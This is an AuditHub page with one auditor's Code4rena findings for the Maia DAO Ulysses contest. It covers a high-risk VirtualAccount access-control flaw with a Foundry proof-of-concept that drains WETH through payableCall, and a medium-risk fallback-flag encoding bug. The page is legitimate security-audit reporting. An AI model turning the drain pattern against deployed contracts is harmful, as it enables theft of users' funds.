Back to SpicyMeatball's contests

Maia DAO - Ulysses - SpicyMeatball's results

Harnessing the power of Arbitrum, Ulysses Omnichain specializes in Virtualized Liquidity Management.

General Information

Platform: Code4rena

Start Date: 22/09/2023

Pot Size: $100,000 USDC

Total HM: 15

Participants: 175

Period: 14 days

Judge: alcueca

Total Solo HM: 4

Id: 287

League: ETH

Maia DAO

Findings Distribution

Researcher Performance

Rank: 41/175

Findings: 2

Award: $113.04

🌟 Selected for report: 0

🚀 Solo Findings: 0

External Links

Code4rena Contest PageGithub Contest RepositoryGithub Findings RepositoryMaia DAO

Findings Information

🌟 Selected for report: 0xTheC0der

Also found by: 0x180db, 0xDING99YA, 0xRstStn, 0xTiwa, 0xWaitress, 0xblackskull, 0xfuje, 3docSec, Aamir, Black_Box_DD, HChang26, Hama, Inspecktor, John_Femi, Jorgect, Kek, KingNFT, Kow, Limbooo, MIQUINHO, MrPotatoMagic, NoTechBG, Noro, Pessimistic, QiuhaoLi, SovaSlava, SpicyMeatball, T1MOH, TangYuanShen, Vagner, Viktor_Cortess, Yanchuan, _eperezok, alexweb3, alexxander, ast3ros, ayden, bin2chen, blutorque, btk, ciphermarco, ether_sky, gumgumzum, gztttt, hals, imare, its_basu, joaovwfreire, josephdara, klau5, kodyvim, ladboy233, marqymarq10, mert_eren, minhtrng, n1punp, nobody2018, oada, orion, peakbolt, peritoflores, perseverancesuccess, pfapostol, rvierdiiev, stuxy, tank, unsafesol, ustas, windhustler, zambody, zzzitron

Awards

0.1127 USDC - $0.11

Labels

bug
3 (High Risk)
satisfactory
sufficient quality report
duplicate-885

External Links

Link to GitHub issue

Lines of code

https://github.com/code-423n4/2023-09-maia/blob/main/src/VirtualAccount.sol#L85-L112

Vulnerability details

Impact

VirtualAccount contract is used to store user's funds, only owner or authorized router are allowed to transfer tokens from it, this is not the case with the permissionless function payableCall. Attacker can construct a malicious payload and execute it with a VirtualAccount, for example approve max amount of tokens and transferFrom them to his address.

Proof of Concept

//SPDX-License-Identifier: MIT
pragma solidity ^0.8.16;

import "./helpers/ImportHelper.sol";
import "forge-std/Test.sol";
import {VirtualAccount, PayableCall} from "src/VirtualAccount.sol";
import "./mocks/WETH9.sol";

contract DummyPort {
    function isRouterApproved(VirtualAccount, address) external pure returns(bool) {
        return false;
    }
}

contract VirtualAccountC4 is Test {
    VirtualAccount target;
    WETH9 weth;
    DummyPort port;

    function setUp() public {
        port = new DummyPort();
        weth = new WETH9();
        target = new VirtualAccount(address(this), address(port));
        weth.deposit{value: 100e18}();
        weth.transfer(address(target), 100e18);
    }

    function testVirtualThief() public {
        address mal = makeAddr("Mal");
        uint256 amount = weth.balanceOf(address(target));
        vm.prank(mal);
        vm.expectRevert();
        target.withdrawERC20(address(weth), amount);
        
        PayableCall[] memory calls = new PayableCall[](1);
        bytes memory payload = abi.encodeWithSignature("approve(address,uint256)", mal, type(uint256).max);
        calls[0] = PayableCall(address(weth), payload, 0);
        vm.startPrank(mal);
        target.payableCall(calls);
        weth.transferFrom(address(target), mal, amount);
        assertEq(weth.balanceOf(mal), amount);
    }
}

Tools Used

Foundry

Apply requiresApprovedCaller modifier

Assessed type

call/delegatecall

#0 - c4-pre-sort

2023-10-08T14:33:42Z

0xA5DF marked the issue as duplicate of #888

#1 - c4-pre-sort

2023-10-08T14:40:52Z

0xA5DF marked the issue as sufficient quality report

#2 - c4-judge

2023-10-26T11:31:52Z

alcueca marked the issue as satisfactory

Findings Information

🌟 Selected for report: kodyvim

Also found by: 0xnev, Kow, QiuhaoLi, SpicyMeatball, ast3ros, ayden, bin2chen, chaduke, jasonxiale, minhtrng, nobody2018

Labels

bug
2 (Med Risk)
satisfactory
sufficient quality report
duplicate-397

Awards

112.9294 USDC - $112.93

External Links

Link to GitHub issue

Lines of code

https://github.com/code-423n4/2023-09-maia/blob/main/src/RootBridgeAgent.sol#L1090

Vulnerability details

Impact

Calling callOutAndBridgeMultiple with a _hasFallbackToggled set to true won't enable the fallback if call will fail on the receiving chain.

Proof of Concept

When calling callOutAndBridgeMultiple a RootBridgeAgent will prepare a settlement payload with _createSettlementmultiple function, in this payload first byte is an operation code, it can be 0x82 if fallback is enabled or 0x02 otherwise. Unfortunately an error in the encoding prevents setting flag to 0x82 if fallback is enabled

https://github.com/code-423n4/2023-09-maia/blob/main/src/RootBridgeAgent.sol#L1090

making it always be 0x02

As you can see on the receiving end in the BranchBridgeAgent, we expect the correct value of 0x82 to enable the fallback

https://github.com/code-423n4/2023-09-maia/blob/main/src/BranchBridgeAgent.sol#L651

Tools Used

Manual review

Set flag to 0x82 if fallback is toggled just like in _performRetrySettlementCall.

https://github.com/code-423n4/2023-09-maia/blob/main/src/RootBridgeAgent.sol#L894

Assessed type

en/de-code

#0 - c4-pre-sort

2023-10-08T05:18:46Z

0xA5DF marked the issue as duplicate of #882

#1 - c4-pre-sort

2023-10-08T15:01:37Z

0xA5DF marked the issue as sufficient quality report

#2 - c4-judge

2023-10-25T10:03:49Z

alcueca marked the issue as satisfactory

AuditHub

A portfolio for auditors, a security profile for protocols, a hub for web3 security.

Built bymalatrax © 2024

Auditors

Browse

Contests

Browse

Get in touch

ContactTwitter